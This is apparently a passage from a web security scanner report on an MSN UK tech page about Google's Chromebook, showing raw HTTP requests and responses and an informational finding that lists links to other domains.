GET /features/photos.aspx?cp-documentid=158635065 HTTP/1.1 Host: tech.uk.msn.com Proxy-Connection: keep-alive Referer: http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Sample=1; MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; countrycode=US; zipcode=75207; sample=1; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; IE9Overlay=0; IE9RemindMe=0; MUID=9D76DAC5D4D147139C18D454161BD61E; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expac=86II8A39_0214:C|; expid=id=559e0a35bc234a18a1b09d1bcfd6438e&bd=2011-08-03T12:59:51.572&v=2; mh=MSFT; CC=US; Sample=1; ebPanelFrequency_.uk.msn.com=6079530%3A2%3A1%3A1312462796548; SRCHHPGUSR=AS=1; s_cc=true; s_sq=msnportaluktech%3D%2526pid%253Dhttp%25253A//tech.uk.msn.com/features/%2526oid%253Dhttp%25253A//tech.uk.msn.com/features/photos.aspx%25253Fcp-documentid%25253D158635065%2526ot%253DA
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: DB3MPPRENA26 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 13:00:10 GMT ntCoent-Length: 107942 Content-Length: 107942 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="urn:sch...[SNIP]... </link><script type="text/javascript" src="http://connect.facebook.net/en_GB/all.js"> </script>...[SNIP]... <div><img src="http://msnportaluktech.112.2O7.net/b/ss/msnportaluktech/1/H.1--NS/0" alt="image beacon" rel="nofollow" /> </div>...[SNIP]... <li><a href="http://mail.live.com"> Hotmail</a>...[SNIP]... <li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1312376411&rver=6.1.6195.0&wp=LBI&wreply=http:%2F%2Ftech.uk.msn.com%2Ffeatures%2Fphotos.aspx%3Fcp-documentid%3D158635065&lc=2057&id=1184" class="dMSNME_1"> Sign in</a>...[SNIP]... <li class="first"><a href="http://mail.live.com"> <img src="http://db2.stb00.s-msn.com/i/F6/528E19AA57C59BD28F9241C1469F1.gif" width="25" height="20" alt="Envelope" /> <span>...[SNIP]... <li><a href="http://www.windowslive.co.uk/messenger?form=MWLMSS&publ=MSNHPTOP4&crea=SITEACQ_CIMS016009_Messenger_EN-GB_0x0_47618"> <img src="http://db2.stb00.s-msn.com/i/DE/73EA3A497EB807310219A1C4D1E9E.gif" width="25" height="20" alt="Two people figures" /> <span>...[SNIP]... <a href="http://uk.my.msn.com/"><img src="http://db2.stb00.s-msn.com/i/48/6CDE404B4BFEC334D023E5422081E0.gif" width="25" height="20" alt="Figure of person in front of computer monitor" /> <span>...[SNIP]... <a href="http://specials.uk.msn.com/msn_directory.aspx"><img src="http://db2.stb01.s-msn.com/i/78/7CE57843948D6DF13E79A2DE4E15C.gif" width="25" height="20" alt="Figure of arrow pointing to screen" /> <span>...[SNIP]... <li class="first"><a href="http://msn.careerbuilder.co.uk/?siteID=INT_UKMSN_HPLink&amp;sc_extcmp=INT_UKMSN_HPLink"> Careers & Jobs</a>...[SNIP]... <li class="last"><a href="http://portal.ebay.eu/msn-UK/"> eBay</a>...[SNIP]... <li class="first"><a href="http://www.bing.com/maps/"> Maps from Bing</a>...[SNIP]... <li><a href="http://www.messengergonemobile.com"> Mobile</a>...[SNIP]... <li class="first"><a href="http://msn.national-lottery.co.uk"> National Lottery</a>...[SNIP]... <div class="tweetbtn"><a href="http://twitter.com/share" data-url="http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&ocid=tweet" data-via="msntech" data-related="msntechnik,winlivematt,msntechverity,msngamesuk" data-lang="en" class="twitter-share-button"> Tweet</a>...[SNIP]... <div class="tweetbtn"><a href="http://twitter.com/share" data-url="http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&ocid=tweet" data-via="msntech" data-related="msntechnik,winlivematt,msntechverity,msngamesuk" data-lang="en" class="twitter-share-button"> Tweet</a>...[SNIP]... <noscript><img src=http://msnportaldev.112.2O7.net/b/ss/msnportaldev/1/H.1--NS/0 height="1" width="1" border="0" alt="" /> </noscript>...[SNIP]... <noscript><img src=http://msnportaldev.112.2O7.net/b/ss/msnportaldev/1/H.1--NS/0 height="1" width="1" border="0" alt="" /> </noscript>...[SNIP]... <li class="first jspopup"><a href="http://del.icio.us/submit?url=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&title=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK" title="Share this page on Del.icio.us" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/53/B85B6DFFC77EF9D86D931DDD3BDEC2.gif" width="16" height="16" alt="Share this page on Del.icio.us" />...[SNIP]... <li class=" jspopup"><a href="http://digg.com/submit?url=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065" title="Share this page on Digg" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/28/77813148B142EF4F4DCEE7372FC215.jpg" width="16" height="16" alt="Share this page on Digg" />...[SNIP]... <li class=" jspopup"><a href="http://www.facebook.com/sharer.php?u=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&t=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK" title="Share this page on Facebook" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/FB/2B2C772B1EAFB0B6D239B186342DCD.gif" width="16" height="16" alt="Share this page on Facebook" />...[SNIP]... <li class=" jspopup"><a href="http://www.google.com/bookmarks/mark?op=add&bkmk=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&title=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK&labels=Get+clued+up+on+all+you+need+to+know+about+Google's+hard+drive-free+laptop." title="Share this page on Google" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/7C/87B79F50DDC866686CE934324DC987.jpg" width="16" height="16" alt="Share this page on Google" />...[SNIP]... <li class=" jspopup"><a href="http://spaces.live.com/blogit.aspx?title=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK&sourceurl=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&description=Get+clued+up+on+all+you+need+to+know+about+Google's+hard+drive-free+laptop." title="Share this page on Live Spaces" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/D2/FF2F70CAE8D665193EC71CE3ABE168.png" width="16" height="16" alt="Share this page on Live Spaces" />...[SNIP]... <li class=" jspopup"><a href="http://www.myspace.com/modules/postto/pages/?u=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&t=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK&c=Get+clued+up+on+all+you+need+to+know+about+Google's+hard+drive-free+laptop." title="Share this page on MySpace" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/85/59DAE3AC143A3D9ECF2F375FBF1EBA.png" width="16" height="16" alt="Share this page on MySpace" />...[SNIP]... <li class=" jspopup"><a href="http://www.newsvine.com/_tools/seed&save?u=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&h=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK" title="Share this page on Newsvine" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/65/B9C2369C5C6C5BA049C34D1F79594.png" width="16" height="16" alt="Share this page on Newsvine" />...[SNIP]... <li class=" jspopup"><a href="http://www.reddit.com/submit?url=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&title=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK" title="Share this page on Reddit" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/EF/40D0FC9056526E4B5AD585674B335B.png" width="16" height="16" alt="Share this page on Reddit" />...[SNIP]... <li class=" jspopup"><a href="http://www.stumbleupon.com/submit?url=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&title=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK" title="Share this page on Stumbleupon" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/31/308235FD5523ECAFB8D864EAFCF570.gif" width="16" height="16" alt="Share this page on Stumbleupon" />...[SNIP]... <li class=" jspopup"><a href="http://www.technorati.com/faves?add=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065" title="Share this page on Technorati" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/2E/5AF3E3DE428277901BD070D694686B.gif" width="16" height="16" alt="Share this page on Technorati" />...[SNIP]... <li class=" jspopup"><a href="http://twitter.com/home?status=add+this:+http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065" title="Share this page on Twitter" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/33/8C170158BB1EC51A16272BCD6F71C.gif" width="16" height="16" alt="Share this page on Twitter" />...[SNIP]... <li class="last jspopup"><a href="http://myweb2.search.yahoo.com/myresults/bookmarklet?u=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&t=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK" title="Share this page on Yahoo! My Web" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/B0/B5F992DCBB333A2421AAB18CB173.gif" width="16" height="16" alt="Share this page on Yahoo! My Web" />...[SNIP]... <li><a href="http://www.twitter.com/msntechnik"> <img src="http://estb.msn.com/i/A0/73EE55691874B316843CF17518A313.jpg" width="135" height="81" alt="Nik Taylor (MSN)" /></a><a href="http://www.twitter.com/msntechnik"> <strong>...[SNIP]... <li><a href="http://www.facebook.com/msnuktech"> <img src="http://estb.msn.com/i/FD/2BBE4796764D3FDC1D26FB8D4E691.jpg" width="135" height="81" alt="Follow us on Facebook (Facebook)" /></a><a href="http://www.facebook.com/msnuktech"> <strong>...[SNIP]... <li><a href="http://www.twitter.com/MSNTechVerity"> <img src="http://estb.msn.com/i/70/46399762CCCE49B80C97A5539134.jpg" width="135" height="81" alt="Verity Burns (MSN)" /></a><a href="http://www.twitter.com/MSNTechVerity"> <strong>...[SNIP]... <li class=" cb"><a href="http://twitter.com/msntech"> <img src="http://estb.msn.com/i/5B/35E8A67D7FFF85E13A4A729429ED6C.jpg" width="135" height="81" alt="Follow @msntech on Twitter (Twitter)" /></a><a href="http://twitter.com/msntech"> <strong>...[SNIP]... <li><a href="http://advertising.microsoft.com/uk/home"> Advertise</a></li><li><a href="http://go.microsoft.com/fwlink/?LinkId=74170"> Privacy</a></li><li class="last"><a href="http://privacy.microsoft.com/en-gb/anti-spam.aspx?HTTP_HOST=privacy2.msn.com&url=/anti-spam/en-gb/default.aspx"> Anti-Spam</a>...[SNIP]... <li><a href="http://ccc01.opinionlab.com/o.asp?id=VYBJNodD"> Report an Error</a>...[SNIP]...
2.3. http://tech.uk.msn.com/features/photos.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tech.uk.msn.com
Path:
/features/photos.aspx
Issue detail
The page was loaded from a URL containing a query string:http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065 The response contains the following links to other domains:http://advertising.microsoft.com/uk/home http://ccc01.opinionlab.com/o.asp?id=VYBJNodD http://connect.facebook.net/en_GB/all.js http://db2.stb00.s-msn.com/i/48/6CDE404B4BFEC334D023E5422081E0.gif http://db2.stb00.s-msn.com/i/DE/73EA3A497EB807310219A1C4D1E9E.gif http://db2.stb00.s-msn.com/i/F6/528E19AA57C59BD28F9241C1469F1.gif http://db2.stb01.s-msn.com/i/78/7CE57843948D6DF13E79A2DE4E15C.gif http://del.icio.us/submit?url=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&title=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK http://digg.com/submit?url=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065 http://go.microsoft.com/fwlink/?LinkId=74170 http://mail.live.com/ http://msn.careerbuilder.co.uk/?siteID=INT_UKMSN_HPLink&sc_extcmp=INT_UKMSN_HPLink http://msn.national-lottery.co.uk/ http://msnportaldev.112.2o7.net/b/ss/msnportaldev/1/H.1--NS/0 http://msnportaluktech.112.2o7.net/b/ss/msnportaluktech/1/H.1--NS/0 http://myweb2.search.yahoo.com/myresults/bookmarklet?u=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&t=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK http://portal.ebay.eu/msn-UK/ http://privacy.microsoft.com/en-gb/anti-spam.aspx?HTTP_HOST=privacy2.msn.com&url=/anti-spam/en-gb/default.aspx http://spaces.live.com/blogit.aspx?title=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK&sourceurl=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&description=Get+clued+up+on+all+you+need+to+know+about+Google's+hard+drive-free+laptop. http://twitter.com/home?status=add+this:+http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065 http://twitter.com/msntech http://twitter.com/share http://www.bing.com/maps/ http://www.facebook.com/msnuktech http://www.facebook.com/sharer.php?u=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&t=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK http://www.google.com/bookmarks/mark?op=add&bkmk=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&title=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK&labels=Get+clued+up+on+all+you+need+to+know+about+Google's+hard+drive-free+laptop. http://www.messengergonemobile.com/ http://www.myspace.com/modules/postto/pages/?u=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&t=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK&c=Get+clued+up+on+all+you+need+to+know+about+Google's+hard+drive-free+laptop. http://www.newsvine.com/_tools/seed&save?u=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&h=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK http://www.reddit.com/submit?url=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&title=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK http://www.stumbleupon.com/submit?url=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&title=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK http://www.technorati.com/faves?add=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065 http://www.twitter.com/MSNTechVerity http://www.twitter.com/msntechnik http://www.windowslive.co.uk/messenger?form=MWLMSS&publ=MSNHPTOP4&crea=SITEACQ_CIMS016009_Messenger_EN-GB_0x0_47618 https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1312376408&rver=6.1.6195.0&wp=LBI&wreply=http:%2F%2Ftech.uk.msn.com%2Ffeatures%2Fphotos.aspx%3Fcp-documentid%3D158635065&lc=2057&id=1184
Request
GET /features/photos.aspx?cp-documentid=158635065 HTTP/1.1 Host: tech.uk.msn.com Proxy-Connection: keep-alive Referer: http://tech.uk.msn.com/features/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Sample=1; MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; countrycode=US; zipcode=75207; sample=1; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; IE9Overlay=0; IE9RemindMe=0; MUID=9D76DAC5D4D147139C18D454161BD61E; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expac=86II8A39_0214:C|; expid=id=559e0a35bc234a18a1b09d1bcfd6438e&bd=2011-08-03T12:59:51.572&v=2; mh=MSFT; CC=US; Sample=1; ebPanelFrequency_.uk.msn.com=6079530%3A2%3A1%3A1312462796548; SRCHHPGUSR=AS=1; s_cc=true; s_sq=msnportaluktech%3D%2526pid%253Dhttp%25253A//tech.uk.msn.com/features/%2526oid%253Dhttp%25253A//tech.uk.msn.com/features/photos.aspx%25253Fcp-documentid%25253D158635065%2526ot%253DA
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: DB3MPPRENA26 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 13:00:08 GMT ntCoent-Length: 107907 Content-Length: 107907 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="urn:sch...[SNIP]... </link><script type="text/javascript" src="http://connect.facebook.net/en_GB/all.js"> </script>...[SNIP]... <div><img src="http://msnportaluktech.112.2O7.net/b/ss/msnportaluktech/1/H.1--NS/0" alt="image beacon" rel="nofollow" /> </div>...[SNIP]... <li><a href="http://mail.live.com"> Hotmail</a>...[SNIP]... <li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1312376408&rver=6.1.6195.0&wp=LBI&wreply=http:%2F%2Ftech.uk.msn.com%2Ffeatures%2Fphotos.aspx%3Fcp-documentid%3D158635065&lc=2057&id=1184" class="dMSNME_1"> Sign in</a>...[SNIP]... <li class="first"><a href="http://mail.live.com"> <img src="http://db2.stb00.s-msn.com/i/F6/528E19AA57C59BD28F9241C1469F1.gif" width="25" height="20" alt="Envelope" /> <span>...[SNIP]... <li><a href="http://www.windowslive.co.uk/messenger?form=MWLMSS&publ=MSNHPTOP4&crea=SITEACQ_CIMS016009_Messenger_EN-GB_0x0_47618"> <img src="http://db2.stb00.s-msn.com/i/DE/73EA3A497EB807310219A1C4D1E9E.gif" width="25" height="20" alt="Two people figures" /> <span>...[SNIP]... <a href="http://uk.my.msn.com/"><img src="http://db2.stb00.s-msn.com/i/48/6CDE404B4BFEC334D023E5422081E0.gif" width="25" height="20" alt="Figure of person in front of computer monitor" /> <span>...[SNIP]... <a href="http://specials.uk.msn.com/msn_directory.aspx"><img src="http://db2.stb01.s-msn.com/i/78/7CE57843948D6DF13E79A2DE4E15C.gif" width="25" height="20" alt="Figure of arrow pointing to screen" /> <span>...[SNIP]... <li class="first"><a href="http://msn.careerbuilder.co.uk/?siteID=INT_UKMSN_HPLink&amp;sc_extcmp=INT_UKMSN_HPLink"> Careers & Jobs</a>...[SNIP]... <li class="last"><a href="http://portal.ebay.eu/msn-UK/"> eBay</a>...[SNIP]... <li class="first"><a href="http://www.bing.com/maps/"> Maps from Bing</a>...[SNIP]... <li><a href="http://www.messengergonemobile.com"> Mobile</a>...[SNIP]... <li class="first"><a href="http://msn.national-lottery.co.uk"> National Lottery</a>...[SNIP]... <div class="tweetbtn"><a href="http://twitter.com/share" data-url="http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&ocid=tweet" data-via="msntech" data-related="msntechnik,winlivematt,msntechverity,msngamesuk" data-lang="en" class="twitter-share-button"> Tweet</a>...[SNIP]... <div class="tweetbtn"><a href="http://twitter.com/share" data-url="http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&ocid=tweet" data-via="msntech" data-related="msntechnik,winlivematt,msntechverity,msngamesuk" data-lang="en" class="twitter-share-button"> Tweet</a>...[SNIP]... <noscript><img src=http://msnportaldev.112.2O7.net/b/ss/msnportaldev/1/H.1--NS/0 height="1" width="1" border="0" alt="" /> </noscript>...[SNIP]... <noscript><img src=http://msnportaldev.112.2O7.net/b/ss/msnportaldev/1/H.1--NS/0 height="1" width="1" border="0" alt="" /> </noscript>...[SNIP]... <li class="first jspopup"><a href="http://del.icio.us/submit?url=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&title=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK" title="Share this page on Del.icio.us" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/53/B85B6DFFC77EF9D86D931DDD3BDEC2.gif" width="16" height="16" alt="Share this page on Del.icio.us" />...[SNIP]... <li class=" jspopup"><a href="http://digg.com/submit?url=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065" title="Share this page on Digg" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/28/77813148B142EF4F4DCEE7372FC215.jpg" width="16" height="16" alt="Share this page on Digg" />...[SNIP]... <li class=" jspopup"><a href="http://www.facebook.com/sharer.php?u=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&t=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK" title="Share this page on Facebook" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/FB/2B2C772B1EAFB0B6D239B186342DCD.gif" width="16" height="16" alt="Share this page on Facebook" />...[SNIP]... <li class=" jspopup"><a href="http://www.google.com/bookmarks/mark?op=add&bkmk=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&title=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK&labels=Get+clued+up+on+all+you+need+to+know+about+Google's+hard+drive-free+laptop." title="Share this page on Google" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/7C/87B79F50DDC866686CE934324DC987.jpg" width="16" height="16" alt="Share this page on Google" />...[SNIP]... <li class=" jspopup"><a href="http://spaces.live.com/blogit.aspx?title=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK&sourceurl=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&description=Get+clued+up+on+all+you+need+to+know+about+Google's+hard+drive-free+laptop." title="Share this page on Live Spaces" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/D2/FF2F70CAE8D665193EC71CE3ABE168.png" width="16" height="16" alt="Share this page on Live Spaces" />...[SNIP]... <li class=" jspopup"><a href="http://www.myspace.com/modules/postto/pages/?u=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&t=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK&c=Get+clued+up+on+all+you+need+to+know+about+Google's+hard+drive-free+laptop." title="Share this page on MySpace" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/85/59DAE3AC143A3D9ECF2F375FBF1EBA.png" width="16" height="16" alt="Share this page on MySpace" />...[SNIP]... <li class=" jspopup"><a href="http://www.newsvine.com/_tools/seed&save?u=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&h=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK" title="Share this page on Newsvine" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/65/B9C2369C5C6C5BA049C34D1F79594.png" width="16" height="16" alt="Share this page on Newsvine" />...[SNIP]... <li class=" jspopup"><a href="http://www.reddit.com/submit?url=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&title=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK" title="Share this page on Reddit" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/EF/40D0FC9056526E4B5AD585674B335B.png" width="16" height="16" alt="Share this page on Reddit" />...[SNIP]... <li class=" jspopup"><a href="http://www.stumbleupon.com/submit?url=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&title=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK" title="Share this page on Stumbleupon" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/31/308235FD5523ECAFB8D864EAFCF570.gif" width="16" height="16" alt="Share this page on Stumbleupon" />...[SNIP]... <li class=" jspopup"><a href="http://www.technorati.com/faves?add=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065" title="Share this page on Technorati" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/2E/5AF3E3DE428277901BD070D694686B.gif" width="16" height="16" alt="Share this page on Technorati" />...[SNIP]... <li class=" jspopup"><a href="http://twitter.com/home?status=add+this:+http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065" title="Share this page on Twitter" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/33/8C170158BB1EC51A16272BCD6F71C.gif" width="16" height="16" alt="Share this page on Twitter" />...[SNIP]... <li class="last jspopup"><a href="http://myweb2.search.yahoo.com/myresults/bookmarklet?u=http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065&t=Need+to+know+-+Google+Chromebook+-+Computer+photos%2c+features+and+reviews%2c+MSN+Tech+%26+Gadgets+-+MSN+UK" title="Share this page on Yahoo! My Web" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/B0/B5F992DCBB333A2421AAB18CB173.gif" width="16" height="16" alt="Share this page on Yahoo! My Web" />...[SNIP]... <li><a href="http://www.twitter.com/msntechnik"> <img src="http://estb.msn.com/i/A0/73EE55691874B316843CF17518A313.jpg" width="135" height="81" alt="Nik Taylor (MSN)" /></a><a href="http://www.twitter.com/msntechnik"> <strong>...[SNIP]... <li><a href="http://www.facebook.com/msnuktech"> <img src="http://estb.msn.com/i/FD/2BBE4796764D3FDC1D26FB8D4E691.jpg" width="135" height="81" alt="Follow us on Facebook (Facebook)" /></a><a href="http://www.facebook.com/msnuktech"> <strong>...[SNIP]... <li><a href="http://www.twitter.com/MSNTechVerity"> <img src="http://estb.msn.com/i/70/46399762CCCE49B80C97A5539134.jpg" width="135" height="81" alt="Verity Burns (MSN)" /></a><a href="http://www.twitter.com/MSNTechVerity"> <strong>...[SNIP]... <li class=" cb"><a href="http://twitter.com/msntech"> <img src="http://estb.msn.com/i/5B/35E8A67D7FFF85E13A4A729429ED6C.jpg" width="135" height="81" alt="Follow @msntech on Twitter (Twitter)" /></a><a href="http://twitter.com/msntech"> <strong>...[SNIP]... <li><a href="http://advertising.microsoft.com/uk/home"> Advertise</a></li><li><a href="http://go.microsoft.com/fwlink/?LinkId=74170"> Privacy</a></li><li class="last"><a href="http://privacy.microsoft.com/en-gb/anti-spam.aspx?HTTP_HOST=privacy2.msn.com&url=/anti-spam/en-gb/default.aspx"> Anti-Spam</a>...[SNIP]... <li><a href="http://ccc01.opinionlab.com/o.asp?id=VYBJNodD"> Report an Error</a>...[SNIP]...
2.4. http://tech.uk.msn.com/features/photos.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tech.uk.msn.com
Path:
/features/photos.aspx
Issue detail
